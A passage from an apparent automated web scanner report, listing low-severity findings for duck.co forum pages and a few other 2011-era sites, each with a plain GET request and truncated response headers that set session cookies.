Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=08EABC57FBF050973CDF27210411137A; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:43:42 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...

7.27. http://duck.co/topic/default-header-color  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://duck.co
Path:   /topic/default-header-color

Request

GET /topic/default-header-color HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=DEC3D0F9DFFCEED8247EE472CACF86C7; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:43:41 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...

7.28. http://duck.co/topic/differentiate-duckduckgo-with-other  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://duck.co
Path:   /topic/differentiate-duckduckgo-with-other

Request

GET /topic/differentiate-duckduckgo-with-other HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=8F5FA64BB525D6728A2BAC0259406010; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:43:40 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...

7.29. http://duck.co/topic/duckduckgo-webs-com-custom-logos  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://duck.co
Path:   /topic/duckduckgo-webs-com-custom-logos

Request

GET /topic/duckduckgo-webs-com-custom-logos HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=3CADD2E8B8C0C0F47E46E570622D0455; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:43:44 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...

7.30. http://duck.co/topic/foss-donation-nominations  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://duck.co
Path:   /topic/foss-donation-nominations

Request

GET /topic/foss-donation-nominations HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=1A459F3FC455AED26D28BE3C11901BF6; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:43:44 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...

7.31. http://duck.co/topic/freenet  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://duck.co
Path:   /topic/freenet

Request

GET /topic/freenet HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0360B7189AF5EEFF368CB736BD95995D; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:43:42 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...

7.32. http://duck.co/topic/historical-traffic-stats  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://duck.co
Path:   /topic/historical-traffic-stats

Request

GET /topic/historical-traffic-stats HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=12D9FDB768C57457838A055E5D07A457; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:43:44 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...

7.33. http://duck.co/topic/how-to-get-similar-growth-for-2011  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://duck.co
Path:   /topic/how-to-get-similar-growth-for-2011

Request

GET /topic/how-to-get-similar-growth-for-2011 HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=76CA424F22087C94848E78162417281C; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:43:42 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...

7.34. http://duck.co/topic/i-did-my-own-way-to-promote-ddg  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://duck.co
Path:   /topic/i-did-my-own-way-to-promote-ddg

Request

GET /topic/i-did-my-own-way-to-promote-ddg HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=DBD8A707DA8070D4C47259AD7ED4D080; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:43:41 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...

7.35. http://duck.co/topic/i-would-love-it-iff-i-need-ideas-fast-please-click  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://duck.co
Path:   /topic/i-would-love-it-iff-i-need-ideas-fast-please-click

Request

GET /topic/i-would-love-it-iff-i-need-ideas-fast-please-click HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=469F9EA60970DCAE63FB30D43244E1ED; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:43:44 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...

7.36. http://duck.co/topic/logging-in-message-email-not-confirmed  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://duck.co
Path:   /topic/logging-in-message-email-not-confirmed

Request

GET /topic/logging-in-message-email-not-confirmed HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=E05794B824FF5DB369DAC23E194BC91D; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:43:42 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...

7.37. http://duck.co/topic/maps  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://duck.co
Path:   /topic/maps

Request

GET /topic/maps HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=3EC58C94636EB07CB73A1AB599936611; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:43:44 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...

7.38. http://duck.co/topic/opera-thread-include-duckduckgo-in-default-search-engines  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://duck.co
Path:   /topic/opera-thread-include-duckduckgo-in-default-search-engines

Request

GET /topic/opera-thread-include-duckduckgo-in-default-search-engines HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=55560CC2612CA4892C6475B0AB38AC52; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:43:42 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...

7.39. http://duck.co/topic/pages-without-favicon-uses-ddg-favicon  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://duck.co
Path:   /topic/pages-without-favicon-uses-ddg-favicon

Request

GET /topic/pages-without-favicon-uses-ddg-favicon HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=F7722410039A9CC1D038B3DC2D070657; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:43:40 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...

7.40. http://duck.co/topic/post-your-ddg-sticker-photos  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://duck.co
Path:   /topic/post-your-ddg-sticker-photos

Request

GET /topic/post-your-ddg-sticker-photos HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=E878614F122C71571B500E40C0B49C7A; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:43:44 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...

7.41. http://duck.co/topic/q-html-entities  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://duck.co
Path:   /topic/q-html-entities

Request

GET /topic/q-html-entities HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=83EB01DC8AD846BE779755E71D6A0882; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:43:42 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...

7.42. http://duck.co/topic/searching-for-roommates-on-craigslist  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://duck.co
Path:   /topic/searching-for-roommates-on-craigslist

Request

GET /topic/searching-for-roommates-on-craigslist HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=93A24F8A3DDC03533A50B787A62B7309; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:43:41 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...

7.43. http://duck.co/topic/spam-site-found  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://duck.co
Path:   /topic/spam-site-found

Request

GET /topic/spam-site-found HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=F9028D6CBE178A549F4A3338753572A0; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:43:44 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...

7.44. http://duck.co/topic/userscript-which-prevents-you-from-accidentally-posting-as-guest  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://duck.co
Path:   /topic/userscript-which-prevents-you-from-accidentally-posting-as-guest

Request

GET /topic/userscript-which-prevents-you-from-accidentally-posting-as-guest HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=6D1A75F00B942D1652E0F6B9E29E064A; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:43:41 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...

7.45. http://duck.co/topic/want-more-visitors-ehh-needs-to-look-more-proffesional  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://duck.co
Path:   /topic/want-more-visitors-ehh-needs-to-look-more-proffesional

Request

GET /topic/want-more-visitors-ehh-needs-to-look-more-proffesional HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=AFA04D112E70A8C90C124B7A6B564011; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:43:42 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...

7.46. http://duck.co/topic/words-to-live-by  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://duck.co
Path:   /topic/words-to-live-by

Request

GET /topic/words-to-live-by HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=05D5D62E0CE753AD032A60147E390761; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:43:42 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...

7.47. http://duck.co/topic/wot-highlighting  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://duck.co
Path:   /topic/wot-highlighting

Request

GET /topic/wot-highlighting HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=DD6E4589E0CDFEF47B821C828656471D; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:43:41 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...

7.48. http://duck.co/topic/ĺ?żĺ?ż  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://duck.co
Path:   /topic/......

Request

GET /topic/...... HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 500 URL_RULE_NOT_CONFIGURED
Set-Cookie: JSESSIONID=9FF678907AFED395D4516ACE8500B79E; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Tue, 01 Mar 2011 02:43:37 GMT
Server: Apache-Coyote/1.1
Connection: close


<link href="/styles/errorpage.css" rel="stylesheet" type="text/css"/>

<title>Requested url not found</title>
<div class="errorpagemain">
<div class="headerArea">
   <div class="headerAre
...[SNIP]...

7.49. http://eventreg.oracle.com/webapps/events/ns/EventsDetail.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://eventreg.oracle.com
Path:   /webapps/events/ns/EventsDetail.jsp

Request

GET /webapps/events/ns/EventsDetail.jsp?p_eventId=117156&src=6804803&src=6804803&Act=40 HTTP/1.1
Host: eventreg.oracle.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/pls/www/go.lp?kw=&Src=6804803&Act=40&pcode=WWMK09049794MPP029
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:19:49 GMT
Server: Oracle-Application-Server-10g/10.1.3.4.0 Oracle-HTTP-Server
Content-Location: http://eventreg.oracle.com/webapps/events/ns/EventDetail.jsp
Set-Cookie: JSESSIONID=561d6403a27d894b8cbb7fbe6e3dc906e1368143af2d06d1b383a001853ccccc.e3yTa3qSb38Te3mRbN0Lc3aQbO0; path=/webapps/events
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 9650


<HTML>
<HEAD>
<META NAME=KEYWORDS CONTENT="Enterprise Content Management, 11g, ECM" >

<title>Events Overview</title>


<link rel="stylesh
...[SNIP]...

7.50. http://havefunforever.com/short-urls-with-your-domain-free-url-shortening-script/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://havefunforever.com
Path:   /short-urls-with-your-domain-free-url-shortening-script/

Request

GET /short-urls-with-your-domain-free-url-shortening-script/ HTTP/1.1
Host: havefunforever.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:30:41 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Cookie
X-Pingback: http://havefunforever.com/xmlrpc.php
Link: <http://havefunforever.com/?p=248>; rel=shortlink
Set-Cookie: PHPSESSID=2b80c06cceb96ac89c208fd1ae7bb150; path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 48611

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<!-- BEGIN html -->
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
...[SNIP]...

7.51. http://img.skitch.com/20100305-d4j9uyhdfermnp92r4tjrtt61a.preview.jpg  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://img.skitch.com
Path:   /20100305-d4j9uyhdfermnp92r4tjrtt61a.preview.jpg

Request

GET /20100305-d4j9uyhdfermnp92r4tjrtt61a.preview.jpg HTTP/1.1
Host: img.skitch.com
Proxy-Connection: keep-alive
Referer: http://rapportive.com/help
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 13:18:19 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: PHPSESSID=i52r6oc66rpd6gispqdbie24v2; path=/; domain=.skitch.com
X-Node-ID: 7b18b27b
Cache-Control: private
Expires: Thu, 01 Mar 2012 13:18:19 GMT
Last-Modified: Thu, 04 Mar 2010 23:42:37 GMT
Content-Length: 25862
Content-Type: image/jpeg

